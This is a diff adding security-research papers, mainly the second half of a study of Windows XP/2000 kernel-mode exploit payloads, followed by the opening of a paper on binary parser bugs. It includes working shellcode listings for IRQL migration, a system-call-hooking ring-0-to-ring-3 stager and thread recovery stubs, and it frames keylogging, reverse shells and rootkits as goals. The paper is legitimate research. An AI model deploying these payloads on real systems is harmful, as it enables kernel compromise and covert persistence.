If the payload is running on XP + +On XP, the technique used to register the thread notify routine requires +creating a callback structure in a global location and manually +inserting it into the nt!PspCreateThreadNotifyRoutine array. This has +to be done in order to avoid IRQL issues. For that reason, a fake +callback structure is created and is designed to be stored at +0xffdf04e0. The actual code that will be executed will be copied to +0xffdf04e8. The function pointer inside the callback structure is +located at offset 0x4, but in the interest of size, both of the first +attributes are initialized to point to 0xffdf04e8. + +It is also important to note that on XP, the +nt!PspCreateThreadNotifyRoutineCount must be incremented so that the +notify routine will actually be called. Fortunately, for versions of XP +currently tested, this value is located 0x20 bytes after the notify +routine array. + +5. If the payload is running on 2000 + +On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of +function pointers. For that reason, registering the notify routine is +much simpler and can actually be done by calling +nt!PsSetCreateThreadNotifyRoutine without much of a concern since no +extra memory is allocated. By calling the real exported routine +directly, it is not necessary to manually increment the +nt!PspCreateThreadNotifyRoutineCount. Furthermore, doing so would not +be as easy as it is on XP because the count variable is located quite a +distance away from the array itself. + +6. Resolve the exported symbol + +The symbol resolution approach taken in this payload involves comparing +part of an exported symbol's name with ``dNot''. This is done because +on XP, the actual symbol needed in order to extract the address of +nt!PspCreateThreadNotifyRoutine is found a few bytes into +nt!PsRemoveCreateThreadNotifyRoutine. However, on 2000, the address of +nt!PsSetCreateThreadNotifyRoutine needs to be resolved as it is going to +be directly called. As such, the offset into the string that is +compared between 2000 and XP differs. For 2000, the offset is 0x10. +For XP, the offset is 0x13. The end result of the resolution process is +that if the payload is running on XP, the eax register will hold the +address of nt!PsRemoveCreateThreadNotifyRoutine and if it's running on +2000 it will hold the address of nt!PsSetCreateThreadNotifyRoutine. + +7. Copy the second stage payload + +Once the symbol has been resolved, the second stage payload is copied to +the destination described in an earlier step. + +8. Set up the notify routine entry + +If the payload is running on XP, a fake callback structure is manually +inserted into the nt!PspCreateThreadNotifyRoutine array and the +nt!PspCreateThreadNotifyRoutineCount is manually incremented. If the +payload is running on 2000, a direct call to +nt!PsSetCreateThreadNotifyRoutine is issued with the pointer to the +copied second stage as the notify routine to be registered. 
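+
+As a minimal C illustration of the Windows 2000 path described in step 8
+-- a hedged sketch written from a driver's point of view for this
+discussion, not the payload itself, with StageNotifyRoutine standing in
+for the copied second stage -- the registration boils down to a single
+documented call:
+
+#include <ntddk.h>
+
+VOID StageNotifyRoutine(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create)
+{
+    /* Called at PASSIVE_LEVEL whenever a thread is created or deleted.
+       A real stage must be safe to re-enter and would do its work here. */
+}
+
+VOID RegisterStage2000(VOID)
+{
+    /* On Windows 2000 the notify routine array holds plain function
+       pointers, so the exported routine can simply be called. */
+    (VOID) PsSetCreateThreadNotifyRoutine(StageNotifyRoutine);
+}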
+ +A payload that implements the thread notify routine approach is +shown below: + + +00000000 FC cld +00000001 A12CF1DFFF mov eax,[0xffdff12c] +00000006 48 dec eax +00000007 6631C0 xor ax,ax +0000000A 6681384D5A cmp word [eax],0x5a4d +0000000F 75F5 jnz 0x6 +00000011 95 xchg eax,ebp +00000012 BF7002DFFF mov edi,0xffdf0270 +00000017 803F01 cmp byte [edi],0x1 +0000001A 66D1C7 rol di,1 +0000001D 57 push edi +0000001E 750E jnz 0x2e +00000020 89F8 mov eax,edi +00000022 83C008 add eax,byte +0x8 +00000025 AB stosd +00000026 AB stosd +00000027 57 push edi +00000028 6A06 push byte +0x6 +0000002A 6A13 push byte +0x13 +0000002C EB05 jmp short 0x33 +0000002E 57 push edi +0000002F 6A81 push byte -0x7f +00000031 6A10 push byte +0x10 +00000033 5A pop edx +00000034 31C9 xor ecx,ecx +00000036 8B7D3C mov edi,[ebp+0x3c] +00000039 8B7C3D78 mov edi,[ebp+edi+0x78] +0000003D 01EF add edi,ebp +0000003F 8B7720 mov esi,[edi+0x20] +00000042 01EE add esi,ebp +00000044 AD lodsd +00000045 41 inc ecx +00000046 01E8 add eax,ebp +00000048 813C10644E6F74 cmp dword [eax+edx],0x746f4e64 +0000004F 75F3 jnz 0x44 +00000051 49 dec ecx +00000052 8B5F24 mov ebx,[edi+0x24] +00000055 01EB add ebx,ebp +00000057 668B0C4B mov cx,[ebx+ecx*2] +0000005B 8B5F1C mov ebx,[edi+0x1c] +0000005E 01EB add ebx,ebp +00000060 8B048B mov eax,[ebx+ecx*4] +00000063 01E8 add eax,ebp +00000065 59 pop ecx +00000066 85C9 test ecx,ecx +00000068 8B1C08 mov ebx,[eax+ecx] +0000006B EB14 jmp short 0x81 +0000006D 5E pop esi +0000006E 5F pop edi +0000006F 6A01 push byte +0x1 +00000071 59 pop ecx +00000072 F3A5 rep movsd +00000074 7808 js 0x7e +00000076 5F pop edi +00000077 893B mov [ebx],edi +00000079 FF4320 inc dword [ebx+0x20] +0000007C EB02 jmp short 0x80 +0000007E FFD0 call eax +00000080 C3 ret +00000081 E8E7FFFFFF call 0x6d + +... R0 stage here ... + + +The R0 stage must keep in mind that it will be called in the context +of a callback, so in order to ensure graceful recovery the stage must +issue a ret 0xc or equivalent instruction upon completion. The R0 stage +must also be capable of being re-entered without having any adverse side +effects. This approach may also be compatible with 2003, but tests were +not performed. This payload could be made significantly smaller if it +were targeted to a specific OS version. One major benefit to this +approach is that the stage will be passed arguments that are very useful +for R3 code injection, such as a ProcessId and ThreadId. + +This approach has quite a few cons. First, the size of the payload +alone makes it less useful due to all the work required to just migrate +to a safe IRQL. Furthermore, this payload also relies on offsets that +may be unreliable across new versions of the operating system, +specifically on XP. It also depends on the pages that the notify +routine array resides at being paged in at the time of the registration. +If they are not, the payload will fail if it is running at a raised IRQL +that does not permit page faults. + +4.1.4) Hooking Object Type Initializer Procedures + + +One theoretical way that could be used to migrate to a safe IRQL would +be to hook into one of the generalized object type initializer +procedures associated with a specific object type, such as +nt!PsThreadType or nt!PsProcessType These procedures can be found in the +OBJECTTYPEINITIALIZER structure. 
The method taken to do this would be to
+first resolve one of the exported object types and then alter one of the
+procedure attributes, such as the OpenProcedure, to point into a buffer
+that contains the payload to execute. The payload could then make a
+determination on whether or not it's safe to execute based on the
+current IRQL. It may also be safe, in some cases, to assume that the
+IRQL will be PASSIVE_LEVEL for a given object type procedure. Matt
+Conover also describes how this can be done in his Malware Profiling and
+Rootkit Detection on Windows paper. Thanks to Derek Soeder for
+suggesting this approach.
+
+4.1.5) Hooking KfRaiseIrql
+
+
+This approach, which was suggested by Derek Soeder, could be quite
+reliable as an IRQL migration component. The basic concept would be to
+resolve and hook hal!KfRaiseIrql. Inside the hook routine, a check could
+be performed to see if the current IRQL is passive and, if so, run the
+rest of the payload. However, as Derek points out, one of the problems
+with this approach would center around the method used to hook the
+function, considering it'd be somewhat expensive to do a detours-style
+preamble hook (although it's fairly easy to disable write protection).
+Still, this approach shows a good line of thinking that could be used to
+get to a safe IRQL.
+
+4.2) Stagers
+
+
+The stager payload component is designed to set up the execution of a
+separate payload either at R0 or R3. This payload component is pretty
+much equivalent to the concept of stagers in user-mode payloads, but
+instead of reading in a payload off the wire for execution, R0 stagers
+typically have the staged payload tacked on to the stager already since
+there is no elegant method of reading in a second stage from the network
+without consuming a lot of space in the process. This section will
+describe some of the techniques that can be used to execute a stage at
+either R0 or R3. The techniques that are theoretical and do not have
+proof of concept code will be described as such.
+
+Although most stagers involve reading more code in off the wire, it
+could also be possible to write an egghunt style stager that searches
+the address space for an egg that is prepended or appended to the code
+that should be executed. The only requirement would be that there be
+some way to get the second stage somewhere in the address space for a
+long enough period of time. Given the right conditions, this approach
+for staging can be quite useful because it reduces the size of the
+initial payload that has to be transmitted or included as part of the
+exploitation request.
+
+4.2.1) System Call Return Address Overwrite
+
+
+A potentially useful way to stage code to R3 would be to hook the system
+call MSR and then alter the return address of the R3 stack to point to
+the stage that is to be executed. This would mean that whenever a
+system call occurred, the return path would bounce through the stage and
+then into the actual return address. This is an interesting vantage
+point for stages because it could give them the ability to filter data
+that is passed back to actual processes. This could potentially make it
+possible for an attacker to install a very simple memory-resident
+rootkit as a result of taking advantage of a vulnerability. This
+approach is purely theoretical, but it is thought that it could be made
+to work without very much overhead.
+
+The basic implementation for such a stager would be to first copy the
+staged payload to a globally accessible location, such as
+SharedUserData. Once copied, the next step would be to hook the
+processor MSR for the system call instruction. The hook routine for the
+system call instruction would then alter the return address of the
+user-mode stack when called to point to the stage's global address and
+should also make it so the stage can restore execution to the actual
+return address after it has completed. Once the return address has been
+redirected, the actual system call can be issued. When the system call
+returns, it would execute the stage. The stage, once completed, would
+then restore registers, such as eax, and transfer control to the actual
+return address.
+
+This approach would be very transparent and should be completely
+reliable. The added benefits of being able to filter system call
+results make it very interesting from a memory-resident rootkit
+perspective.
+
+4.2.2) Thread APC
+
+
+One of the most logical ways to go about staging a payload from R0 to R3
+is through the use of Asynchronous Procedure Calls (APCs). The purpose
+of an APC is to allow code to be executed in the context of an existing
+thread without disrupting the normal course of execution for the thread.
+As such, it happens to be very useful for R0 payloads that want to run
+an R3 payload. This is the technique that was discussed at length in
+eEye's paper. A few steps are required to accomplish this.
+
+First, the R3 payload must be copied to a location that will be
+accessible from a user-mode process, such as SharedUserData. After the
+copy has completed, the next step is to locate the thread that the APC
+should be queued to. There are a few important things to keep in mind in
+this step. For instance, it is likely the case that the R3 payload will
+want to be run in the context of a privileged process. As such, a
+privileged process must first be located and a thread running within it
+must be found. Secondly, the thread that will have the APC queued to it
+must be in the alertable state; otherwise, the APC insertion will fail.
+
+Once a suitable thread has been located, the final step is to initialize
+the APC and point the APC routine to the user-mode equivalent address
+via nt!KeInitializeApc and insert it into the thread's APC queue via
+nt!KeInsertQueueApc. After that has completed, the code will be run in
+the context of the thread that the APC was queued to and all will be
+well.
+
+One of the major concerns about this type of approach is that it will
+generally have to rely on undocumented offsets for fields in structures
+like EPROCESS and ETHREAD that are very volatile across operating system
+versions. As such, making a portable payload that uses this technique
+is perfectly feasible, but it may come at the cost of size due to the
+requirement of factoring in different offsets and detecting the version
+at runtime.
+
+The approach outlined by eEye works perfectly fine and is well thought
+out, and as such this subsection will merely describe ways in which it
+might be possible to improve the existing implementation. One way in
+which it might be optimized would be to eliminate the call to
+nt!PsLookupProcessByProcessId, but as their paper points out, this would
+only be possible for vulnerabilities that are triggered outside of the
+context of the Idle process. However, for cases where this is not a
+limitation, it would be easier to extract the current thread's process
+from the KPRCB.
This can be accomplished through the following disassembly This +may not be safe if the KPRCB is not located immediately after the KPCR: + + +00000000 A124F1DFFF mov eax,[0xffdff124] +00000005 8B4044 mov eax,[eax+0x44] + + +After the process has been extracted, enumeration to find a privileged +system process could be done in exactly the same manner as the paper +describes (by enumerating the ActiveProcessLinks). + +Another improvement that might be made would be to use SharedUserData as +a storage location for the initialized KAPC structure rather than +allocating storage for it with nt!ExAllocatePool. This would save some +space by eliminating the need to resolve and call nt!ExAllocatePool. +While the approach outlined in the paper describes nt!ExAllocatePool as +being used to stage the payload to an IRQL safe buffer, it would be +equally feasible to do so by using nt!SharedUserData for storage. + +4.2.3) User-mode Function Pointer Hook + + +If a vulnerability is triggered in the context of a process then the +doors open up to a whole wide array of possibilities. For instance, the +FastPebLockRoutine could be hooked to call into some code that is +present in SharedUserData prior to calling the real lock routine. This +is just one example of the different types of function pointers that +could be hooked relative to a process. + +4.2.4) SharedUserData SystemCall Hook + + + +------------+-----------------+ + | Type: | R0 to R3 Stager | + | Size: | 68 bytes | + | Compat: | XP, 2003 | + | Migration: | Not necessary | + +------------+-----------------+ + + +One particularly useful approach to staging a R3 payload from R0 is to +hijack the system call dispatcher at R3. To accomplish this, one must +have an understanding of the basic mechanism through which system calls +are dispatched in user-mode. Prior to Windows XP, system calls were +dispatched through the soft-interrupt 0x2e. As such, the method +described in this subsection will not work on Windows 2000. However, +starting with XP SP0, the system call interface was changed to support +using processor-specific instructions for system calls, such as sysenter +or syscall. + +To support this, Microsoft added fields to the KUSER_SHARED_DATA +structure, which is symbolically known as SharedUserData, that held +instructions for issuing a system call. These instructions were placed +at offset 0x300 by the kernel and took a form like the code shown below: + + +kd> dt _KUSER_SHARED_DATA 0x7ffe0000 +... ++0x300 SystemCall : [4] 0xc819cc3`340fd48b +kd> u SharedUserData!SystemCallStub L3 +SharedUserData!SystemCallStub: +7ffe0300 8bd4 mov edx,esp +7ffe0302 0f34 sysenter +7ffe0304 c3 ret + + +To make use of this dynamic code block, each system call stub in +ntdll.dll was implemented to make a call into the instructions found at +that location. + + +ntdll!ZwAllocateVirtualMemory: +77f7e4c3 b811000000 mov eax,0x11 +77f7e4c8 ba0003fe7f mov edx,0x7ffe0300 +77f7e4cd ffd2 call edx + + +Due to the fact that SharedUserData contained executable instructions, +it was thus necessary that the SharedUserData mapping had to be marked +as executable. When Microsoft began work on some of the security +enhancements included with XP SP2 and 2003 SP1, such as Data Execution +Prevention (DEP), they presumably realized that leaving SharedUserData +executable was largely unnecessary and that doing so left open the +possibility for abuse. 
To address this, the fields in KUSER_SHARED_DATA +were changed from sets of instructions to function pointers that resided +within ntdll.dll. The output below shows this change: + + + +0x300 SystemCall : 0x7c90eb8b + +0x304 SystemCallReturn : 0x7c90eb94 + +0x308 SystemCallPad : [3] 0 + + +To make use of the function pointers, each system call stub was changed to +issue an indirect call through the SystemCall function pointer: + + +ntdll!ZwAllocateVirtualMemory: +7c90d4de b811000000 mov eax,0x11 +7c90d4e3 ba0003fe7f mov edx,0x7ffe0300 +7c90d4e8 ff12 call dword ptr [edx] + + +The importance behind the approaches taken to issue system calls is that it is +possible to take advantage of the way in which the system call dispatching +interfaces have been implemented. These interfaces can be manipulated in a +manner that allows a payload to be staged from R0 to R3 with very little +overhead. The basic idea behind this approach is that a R3 payload is layered +in between the system call stubs and the kernel. The R3 payload then gets an +opportunity to run prior to a system call being issued within the context of an +arbitrary process. + +This approach has quite a few advantages. First, the size of the staging +payload is relatively small because it requires no symbol resolution or other +means of directly scheduling the execution of code in an arbitrary or specific +process. Second, the staging mechanism is inherently IRQL-safe because +SharedUserData cannot be paged out. This benefit makes it such that a +migration technique does not have to be employed in order to get the R0 payload +to a safe IRQL. + +One of the disadvantages of the payload outlined below is that it relies on +SharedUserData being executable. However, it should be trivial to alter the +PTE for SharedUserData to set the execute bit if necessary, thus eliminating +the DEP concern. + +Another thing to keep in mind about this stager is that the R3 payload must be +written in a manner that allows it to be re-entrant. Since the R3 payload is +layered between user-mode and kernel-mode for system call dispatching, it can +be assumed that the payload will get called many times in many different +process contexts. It is up to the R3 payload to figure out when it should do +its magic and when it should not. + +The following steps outline one way in which a stager of this type could be +implemented. + + +1. Obtain the address of the R3 payload + + +In order to prepare to copy the R3 payload to SharedUserData (or some other +globally-accessible region), the address of the R3 payload must be determined +in some arbitrary manner. + +2. Copy the R3 payload to the global region + + +After obtaining the address of the R3 payload, the next step would be to copy +it to a globally accessible region. One such region would be in +SharedUserData. This requires that SharedUserData be executable. + +3. Determine OS version + + +The method used to layer between system call stubs and the kernel differs +between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or not the +machine is XP SP0/SP1, a comparison can be made to see if the first two bytes +found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp +instruction). If they are equal, then the operating system is assumed to be XP +SP0/SP1. Otherwise, it is assumed to be XP SP2+. + +4. 
Hooking on XP SP0/SP1 + + +If the operating system version is XP SP0/SP1, hooking is accomplished by +overwriting the first two bytes at 0xffdf0300 with a short jump instruction to +some offset within SharedUserData that is not used, such as 0xffdf037c. Prior +to doing this overwrite, a few instructions must be appended to the copied R3 +payload that act as a method of restoring execution so that the original system +call actually executes. This is accomplished by appending a mov edx, esp / mov +ecx, 0x7ffe0302 / jmp ecx instruction set. + +5. Hooking on XP SP2+ + + +If the operating system version is XP SP2, hooking is accomplished by +overwriting the function pointer found at offset 0x300 within SharedUserData. +Prior to overwriting the function pointer, the original function pointer must +be saved and an indirect jmp instruction must be appended to the copied R3 +payload so that system calls can still be processed. The original function +pointer can be saved to 0xffdf0308 which is currently defined as being used for +padding. The jmp instruction can therefore indirectly acquire the original +system call dispatcher address from 0x7ffe0308. + + +The following code illustrates an implementation of this type of staging +payload. It's roughly 68 bytes in size, excluding the R3 payload and the +recovery method. + + +00000000 EB3F jmp short 0x41 +00000002 BB0103DFFF mov ebx,0xffdf0301 +00000007 4B dec ebx +00000008 FC cld +00000009 8D7B7C lea edi,[ebx+0x7c] +0000000C 5E pop esi +0000000D 57 push edi +0000000E 6A01 push byte +0x1 ; number of dwords to copy +00000010 59 pop ecx +00000011 F3A5 rep movsd +00000013 B88BD4B902 mov eax,0x2b9d48b +00000018 663903 cmp [ebx],ax +0000001B 7511 jnz 0x2e +0000001D AB stosd +0000001E B803FE7FFF mov eax,0xff7ffe03 +00000023 AB stosd +00000024 B0E1 mov al,0xe1 +00000026 AA stosb +00000027 66C703EB7A mov word [ebx],0x7aeb +0000002C 5F pop edi +0000002D C3 ret ; substitute with recovery method +0000002E 8B03 mov eax,[ebx] +00000030 8D4B08 lea ecx,[ebx+0x8] +00000033 8901 mov [ecx],eax +00000035 66C707FF25 mov word [edi],0x25ff +0000003A 894F02 mov [edi+0x2],ecx +0000003D 5F pop edi +0000003E 893B mov [ebx],edi +00000040 C3 ret ; substitute with recovery method +00000041 E8BCFFFFFF call 0x2 + +... R3 payload here ... + +4.3) Recovery + + +Another distinction between kernel-mode vulnerabilities and user-mode +vulnerabilities is that it is not safe to simply let the kernel crash. If the +kernel crashes, the box will blue screen and the payload that was transmitted +may not even get a chance to run. As such, it is necessary to identify ways in +which normal execution can be resumed after a kernel-mode vulnerability has +been triggered. However, like most things in the kernel, the recovery method +that can be used is highly dependent on the vulnerability in question, so it +makes sense to have a few possible approaches. Chances are, though, that the +methods listed in this document will not be enough to satisfy every situation +and in many cases may not even be the most optimal. For this reason, +kernel-mode exploit writers are encouraged to research more specific recovery +methods when implementing an exploit. Regardless of these concerns, this +section describes the general class of recovery payloads and identifies +scenarios in which they may be most useful. + +4.3.1) Thread Spinning + + +For situations where a vulnerability occurs in a non-critical kernel thread, it +may be possible to simply cause the thread to spin or block indefinitely. 
This +approach is very useful because it means that there is no requirement to +gracefully restore execution in some manner. It basically skirts the issue of +recovery altogether. + +4.3.1.1) Delaying Thread Execution + + +This method was proposed by eEye and involved using nt!KeDelayExecutionThread +as a way of blocking the calling thread without adversely impacting +performance. Alternatively, if nt!KeDelayExecutionThread failed or returned, +eEye implemented their payload in such a way as to cause it to spin while +calling nt!KeYieldExecution each iteration. The approach that eEye suggests is +perfectly fine, assuming the following minimum conditions are true: + + + - Non-critical kernel thread + - No exclusive locks (such as spin locks) are held by a calling frame + + +If any one of these conditions is not true, the act of spinning or otherwise +blocking the thread from continuing normal execution could lead to a deadlock. +If the setting is right, though, this method is perfectly acceptable. If the +approach described by eEye is used, it will require the resolution of +nt!KeDelayExecutionThread at a minimum, but could also require the resolution +of nt!KeYieldExecution depending on how robust the recovery method is intended +to be. The fact that this requires symbol resolution means that the payload +will jump significantly in size if it does not already involve the resolution +of symbols. + +4.3.1.2) Spinning the Calling Thread + + + +---------------+--------------------+ + | Type: | R0 Recovery | + | Size: | 2 bytes | + | Compat: | All | + | Migration: | May be required | + | Requirements: | No held locks | + +---------------+--------------------+ + +An alternative approach is to just spin the calling thread at PASSIVE_LEVEL. +If the conditions are right, this should not lead to a deadlock, but it is +likely that performance will be adversely affected. The benefit is that it +does not increase the size of the payload by much considering such an approach +can be implemented in two bytes: + + +00000000 EBFE jmp short 0x0 + + +4.3.2) Throwing an Exception + + + +---------------+---------------------------------+ + | Type: | R0 Recovery | + | Size: | 3 bytes | + | Compat: | All | + | Migration: | Not necessary | + | Requirements: | No held locks in wrapped frame | + +---------------+---------------------------------+ + + +If a vulnerability occurs in the context of a frame that is wrapped in an +exception handler, it may be possible to simply trigger an exception that will +allow execution to continue like normal. Unfortunately, the chances of this +recovery method being usable are very slim considering most vulnerabilities are +likely to occur outside of the context of an exception wrapped frame. The +usability of this approach can be tested fairly simply by triggering the +overflow in such a way as to cause an exception to be thrown. If the machine +does not crash, it could be the case that the vulnerability occurred in a +function that is wrapped by an exception handler. Assuming this is the case, +writing a payload that simply triggers an exception is fairly trivial. 
+ + +00000000 31F6 xor esi,esi +00000002 AC lodsb + + +4.3.3) Thread Restart + + + +---------------+---------------------+ + | Type: | R0 Recovery | + | Size: | 41 bytes | + | Compat: | 2000, XP | + | Migration: | May be required | + | Requirements: | No held locks | + +---------------+---------------------+ + + +If a vulnerability occurs in the context of a system worker thread, it may be +possible to cause the thread to restart execution at its entry point without +any major adverse side effects. This avoids the issue of having to restore +normal execution for the context of the current call frame. To accomplish +this, the StartAddress must be extracted from the calling thread's ETHREAD +structure. Due to the fact that this relies on the use of undocumented fields, +it follows that portability could be a problem. The following table shows the +offsets to the StartAddress routine for different operating system versions: + + + +------------------+---------------------+----------------------+ + | Platform | StartAddress Offset | Stack Restore Offset | + +------------------+---------------------+----------------------+ + | Windows 2000 SP4 | 0x230 | 0x254 | + | Windows XP SP0 | 0x224 | 0x250 | + | Windows XP SP2 | 0x224 | 0x250 | + +------------------+---------------------+----------------------+ + + +A payload that implements this approach that should be compatible with all of +the above described offsets is shown below. Testing was only performed on XP +SP0: + + +00000000 6A24 push byte +0x24 +00000002 5B pop ebx +00000003 FEC7 inc bh +00000005 648B13 mov edx,[fs:ebx] +00000008 FEC7 inc bh +0000000A 8B6218 mov esp,[edx+0x18] +0000000D 29DC sub esp,ebx +0000000F 01D3 add ebx,edx +00000011 803D7002DFFF01 cmp byte [0xffdf0270],0x1 +00000018 7C07 jl 0x21 +0000001A 8B03 mov eax,[ebx] +0000001C 83EC2C sub esp,byte +0x2c +0000001F EB06 jmp short 0x27 +00000021 8B430C mov eax,[ebx+0xc] +00000024 83EC30 sub esp,byte +0x30 +00000027 FFE0 jmp eax + + +This implementation works by first obtaining the current thread context through +fs:0x124. Once obtained, a check is performed to see which operating system +the payload is running on by looking at the NtMinorVersion attribute of the +KUSER_SHARED_DATA structure. The reason this is necessary is because the +offsets needed to obtain the StartAddress of the thread and the offset that is +needed when restoring the stack are different depending on which operating +system is being used. After resolving the StartAddress and adjusting the stack +pointer to reflect what it would have been when the function was originally +called, all that's required is to transfer control to the StartAddress. + +This approach, at least in this specific implementation, may be closely tied to +vulnerabilities that occur in system worker thread routines, specifically those +that start at nt!ExpWorkerThread. However, the principals could be applied to +other system worker threads if the illustrated implementation proves limited. +It is also important to realize that since this method depends on undocumented +version-specific offsets, it is highly likely that it may not be portable to +new versions of the kernel. This approach should also be compatible with +Windows 2003 Server SP0/SP1, but the offsets are likely to be different and +have not been obtained or tested at this point. 
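+
+For illustration, the core of the thread restart technique can be
+expressed in C as the hedged sketch below, written for this discussion
+only. The offset parameter is the undocumented, version-specific
+StartAddress offset from the table above (0x224 on XP, 0x230 on 2000
+SP4), and the stack rewinding performed by the assembly has no portable
+C equivalent, so it is omitted:
+
+#include <ntddk.h>
+
+typedef VOID (*WORKER_START_ROUTINE)(PVOID StartContext);
+
+VOID RestartCurrentWorkerThread(ULONG StartAddressOffset)
+{
+    /* Read the undocumented StartAddress field out of the current
+       ETHREAD at the supplied version-specific offset. */
+    UCHAR *Thread = (UCHAR *)KeGetCurrentThread();
+    WORKER_START_ROUTINE Start =
+        *(WORKER_START_ROUTINE *)(Thread + StartAddressOffset);
+
+    /* NULL stands in for the original StartContext, which this sketch
+       does not recover; the real payload jumps here after rewinding the
+       stack instead of making a nested call. */
+    Start(NULL);
+}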
+ +4.3.4) Lock Release + + +Judging from some of the other recovery methods described in this document, it +can be seen that one of the biggest limiting factors has to do with locks being +held when recovery is attempted. To deal with this problem, one would have to +implement a solution that was capable of releasing held locks prior to using a +recovery method. This is more of a theoretical solution than a concrete one, +but if it were possible to release locks held by a thread prior to recovery, +then it would be possible to use some of the more elegant recovery methods. As +it stands, though, the authors are not aware of a feasible solution to this +problem that is capable of releasing the various types of locks in a general +manner. Instead, it would most likely be better to attack this problem on a +per-vulnerability basis rather than attempting to come up with an +all-encompassing solution. + +Without a proper lock releasing solution, it is likely that even if a +vulnerability can be triggered, the box may deadlock. Again, this is highly +dependent on the vulnerability in question, but it's not something that should +be considered an academic concern. + +4.4) Stages + + +The purpose of the stage payload component is to perform whatever arbitrary +task is desired, whether it be to hook the keyboard and send key strokes to the +attacker or to spawn a reverse shell in the context of a user-mode process. +The definition of the stage component is very broad as to encompass pretty much +any end-goal an attacker might have. For that reason, this section is +relatively sparse on details and is instead left up to the reader to decide +what type of action they would like to perform. The paper eEye has provided +shows some concrete examples of kernel-mode stages. There are also many +examples of existing user-mode payloads that could be staged to run in the +context of a user-mode process. In the future, stages will most likely be the +focal point of kernel-mode payload research. + +5) Conclusion + + +This document has illustrated some of the general techniques that can be used +when implementing kernel-mode payloads. Examples have been provided for +techniques that can be used to locate the base address of nt and an example +routine has been provided to illustrate symbol resolution. To make kernel-mode +payloads easier to grasp, their anatomy has been broken down into four distinct +units that have been referred to as payload components. These four payload +components can be combined together to form a logical kernel-mode payload. + +The purpose of the migration payload component is to transition the processor +to a safe IRQL so that the rest of the payload can be executed. In some cases, +it's also necessary to make use of a stager payload component in order to move +the payload to another thread context or location for the purpose of execution. +Once the payload is at a safe IRQL and has been staged as necessary, the actual +meat of the payload can be run. This portion of the payload is symbolically +referred to as the stage payload component. After everything is said and done, +the kernel-mode payload has to find some way to ensure that the kernel does not +crash. To accomplish this, a situational recovery payload component can be +used to allow the kernel to continue to execute properly. + +While the vectors taken to achieve code execution have not been described in +this document, it is expected that there will continue to be research and +improvements in this field. 
A cycle similar to that seen for user-mode +vulnerabilities can be equally expected in the kernel-mode arena once enough +interest is gained. With the eye of security vendors intently focused on +solving the problem of user-mode software vulnerabilities, the kernel-mode +arena will be a playground ripe for research and discovery. + + +Bibliography + +Conover, Matt. Malware Profiling and Rootkit Detection on +Windows. +http://xcon.xfocus.org/archives/2005/Xcon2005_Shok.pdf; +accessed Dec. 12, 2005. + + +eEye Digital Security. Remote Windows Kernel Exploitation: +Step into the Ring 0. +http://www.eeye.com/ data/publish/whitepapers/research/OT20050205.FILE.pdf; +accessed Dec. 8, 2005. + + +skape. Safely Searching Process Virtual Address Space. +http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf; +accessed Dec. 12, 2005. + + +SoBeIt. How to Exploit Windows Kernel Memory Pool. +http://packetstormsecurity.nl/Xcon2005/Xcon2005_SoBeIt.pdf; +accessed Dec. 11, 2005. + + +System Inside. Sysenter. +http://system-inside.com/driver/sysenter/sysenter.html; +accessed Nov. 23, 2005. diff --git a/uninformed/3.3.txt b/uninformed/3.3.txt new file mode 100644 index 0000000..f2d812b --- /dev/null +++ b/uninformed/3.3.txt @@ -0,0 +1,599 @@ +Analyzing Common Binary Parser Mistakes +Orlando Padilla +xbud@g0thead.com +Last modified: 12/05/2005 + +Abstract: With just about one file format bug being +consistently released on a weekly basis over the past six to twelve +months, one can only hope developers would look and learn. The +reality of it all is unfortunate; no one cares enough. These bugs +have been around for some time now, but have only recently gained +media attention due to the large number of vulnerabilities being +released. Researchers have been finding more elaborate and passive +attack vectors for these bugs, some of which can even leverage a +remote compromise. + +No new attacks will be presented in this document, as examples and +an example file format will be presented to demonstrate an insecure +implementation of a parsing library. As a bonus for reading this +article, an undisclosed bug in a popular debugger will be released +during the case study material of this paper. This vulnerability, +if leveraged properly, will cause the debugger to crash during the +loading of a binary executable or dynamic library. + +Disclaimer: This document is written with an educational +interest and I cannot be held liable for any outcome of the +information being released. + + +Thanks: #vax, nologin, and jimmy haffa + += Introduction + + +A number of papers have already been written describing the +exploitation of integer overflows, however, very few publications +have been aimed at the exploitation of integer overflows within +binary parsers. The current slew of advisories released by iDefense +(Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and +Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format +bugs should be enough to take these bugs seriously. + + +The most common mistake applied by a programmer is in trusting a +field inside a binary structure that should not be trusted. During +the design phase: efficiency, simplicity and the secure +implementation of a particular project should be at the top of the +priority list. When dealing with data that cannot be presented only +as strings, a length field is required to tell the application when +to stop reading. 
When dealing with sections that must have +subsections, knowing ahead of time how many sections are embedded +within the primary section of a structure is required and again, a +value must be used to instruct the application only to iterate +x number of times. In the following paragraphs, the +description of a binary file structure will be presented, followed +by applied examples of typical coding errors encountered when +auditing applications. An overview of integer overflows will be +discussed for the sake of completeness. Finally, a case study of +several bugs found during the research of a particular file format +will be shown. + += Certificate Storage File + + +The following file format was designed and written specifically for +this article and has no real world applicable use. The general idea +behind the implementation of this file format is to create a single +binary file acting as a searchable database for certificate files. +The file will consist of two core structures, which will hold the +information necessary to parse the certificates in DER format. This +is a rough diagram of what the file looks like after compilation: + + +----------------------+-----------+---------+ + | Structure | Offset | Size | + +----------------------+-----------+---------+ + | OP Header | 0 | 4 | + | Element Count | 4 | 2 | + | Cert File Fmt Struct | 6 | 6 | + | Cert Data Struct | 12 | 16 | + | Cert 1 | | | + | Cert 2 | | | + | Cert | | | + | Cert n | | | + +----------------------+-----------+---------+ + + += Binary Layout + + + +The following structures are defined on the file format's compiler +library. + + +typedef struct _CERTFF +{ + unsigned int NumberOfCerts; + unsigned short PointerToCerts; +}CERTFF,*PCERTFF; + +typedef struct _CERTDATA +{ + char Name[8]; + unsigned short CertificateLen; + unsigned short PointerToDERs; + unsigned char *DataPtr; +}CERTDATA,*PCERTDATA; + + +The first data structure consists of two unsigned integers, (short) +NumberOfCerts and (long) PointerToCerts. These hold the number of +certificates in total, stored in this binary NumberOfCerts and the +offset from the beginning of the file to the first certificate data +structure CERTDATA PointerToCerts. We can already assume that a +parser will iterate through the image file NumberOfCerts times, +starting from PointerToCerts in chunks of the size of CERTDATA at a +time. The second data structure consists of a character array 8 +bytes in size, which is used to hold the first 7 characters of a +certificate's description, followed by two unsigned short integers 